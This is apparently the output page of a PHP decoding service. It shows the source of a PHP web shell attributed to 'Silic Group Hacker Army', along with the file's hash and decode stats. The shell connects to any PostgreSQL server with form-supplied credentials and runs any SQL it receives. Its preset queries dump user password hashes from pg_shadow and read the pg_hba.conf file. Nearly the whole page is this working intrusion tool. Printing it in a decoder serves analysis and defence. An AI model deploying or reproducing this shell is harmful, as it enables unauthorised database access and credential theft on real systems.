Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<!----> <!-- Author:YoCo Smart--> <!-- - Silic Group Hacker Army--> <html style="backgroun..
Decoded Output download
<!--SQL-->
<p style="font-size:10pt;font-family:Lucida Handwriting,Times New Roman;">
<br>
SQLPostgreSQL 8.1<br>
<br>
select relname from pg_stat_user_tables limit 1 offset n;<br>
PostgreSQL<a href="http://nana.blackbap.org/?p=archive&id=55" target="_blank">[]</a><br>
<br></p>
<form name="pgform" method="POST" action="?">
:<input type="text" name="pghost" value="" style="width:100px">
:<input type="text" name="pguser" value="postgres" style="width:100px">
:<input tyoe="text" name="pgpass" value="" style="width:100px">
:<input type="text" name="pgdb" value="postgres" style="width:100px"><br><br>
<textarea name="pgsql" style="width:600px;height:200px;">select version()</textarea><br>
<input type="text" name="pgport" value="" style="width:50px">
<select onchange="return pgFull(options[selectedIndex].value)">
<option value="0" selected></option>
<option value="1"></option>
<option value="2"></option>
<option value="3"></option>
<option value="4">hashes</option>
<option value="5">pg_hb.conf</option>
</select>
<input type="hidden" name="sql" value="YoCo Smart">
<input type="submit" value="SQL">
<font style="font-size:10pt;"> <a href="http://blackbap.org" target="_blank">Silic Group Hacker Army</a>©2009-2012</font></form>
<!--SQL-->
Did this file decode correctly?
Original Code
<!---->
<!-- Author:YoCo Smart-->
<!-- - Silic Group Hacker Army-->
<html style="background:#f7f7f7;">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>PostgreSQL - YoCo Smart - Silic Group Hacker Army - BlackBap.Org</title>
<script language="javascript">
function pgFull(i){
Str = new Array(6);
Str[0] = "select version();";
Str[1] = "select datname from pg_database;";
Str[2] = "select table_name from information_schema.columns limit 1 offset n;";
Str[3] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;";
Str[4] = "select usename,passwd from pg_shadow;";
Str[5] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
pgform.pgsql.value = Str[i];
return true;
}
</script>
</head>
<body>
<center>
<?php
/**********/
$pghost=$_POST['pghost'] ? $_POST['pghost']:'';
$pgport=$_POST['pgport'] ? $_POST['pgport']:'';
$pguser=$_POST['pguser'] ? $_POST['pguser']:'postgres';
$pgpass=$_POST['pgpass'] ? $_POST['pgpass']:'';
$pgdb=$_POST['pgdb'] ? $_POST['pgdb']:'postgres';
$pgquery=$_POST['pgsql'] ? $_POST['pgsql']:'select version()';
$pgquery=stripslashes($pgquery);
print<<<END
<!--SQL-->
<p style="font-size:10pt;font-family:Lucida Handwriting,Times New Roman;">
<br>
SQLPostgreSQL 8.1<br>
<br>
select relname from pg_stat_user_tables limit 1 offset n;<br>
PostgreSQL<a href="http://nana.blackbap.org/?p=archive&id=55" target="_blank">[]</a><br>
<br></p>
<form name="pgform" method="POST" action="?">
:<input type="text" name="pghost" value="{$pghost}" style="width:100px">
:<input type="text" name="pguser" value="{$pguser}" style="width:100px">
:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px">
:<input type="text" name="pgdb" value="{$pgdb}" style="width:100px"><br><br>
<textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br>
<input type="text" name="pgport" value="{$pgport}" style="width:50px">
<select onchange="return pgFull(options[selectedIndex].value)">
<option value="0" selected></option>
<option value="1"></option>
<option value="2"></option>
<option value="3"></option>
<option value="4">hashes</option>
<option value="5">pg_hb.conf</option>
</select>
<input type="hidden" name="sql" value="YoCo Smart">
<input type="submit" value="SQL">
<font style="font-size:10pt;"> <a href="http://blackbap.org" target="_blank">Silic Group Hacker Army</a>©2009-2012</font></form>
<!--SQL-->
END;
if(!empty($pghost) && !empty($pgport)){
$conn="host=".$pghost." port=".$pgport." dbname=".$pgdb." user=".$pguser." password=".$pgpass;
}else{
$conn="dbname=".$pgdb." user=".$pguser." password=".$pgpass;
}
if(!empty($_POST['sql'])){
$pgconn = pg_connect($conn)
or die(':'.pg_last_error());
$pgresult=pg_query($pgquery) or die('SQL:<br>'.pg_last_error());
$pgrow=pg_fetch_row($pgresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
for ($i=0; $i< pg_num_fields($pgresult); $i++)
{echo '<td bgcolor="#293F5F"><b>'.pg_field_name($pgresult, $i)."</b></td>\n";}
echo "</tr>\n";
pg_result_seek($pgresult, 0);
while ($pgrow=pg_fetch_row($pgresult))
{
echo "<tr>\n";
for ($i=0; $i<pg_num_fields($pgresult); $i++ )
{echo '<td bgcolor="#FFFFE0">'."$pgrow[$i]".'</td>';}
echo "</tr>\n";
}
echo "</table>\n"."</font>";
pg_free_result($pgresult);
pg_close();
}
?>
</center>
</body></html>
Function Calls
stripslashes | 1 |
Stats
MD5 | 104c85f2e4ca44b0e8f794c5b0d191c0 |
Eval Count | 0 |
Decode Time | 119 ms |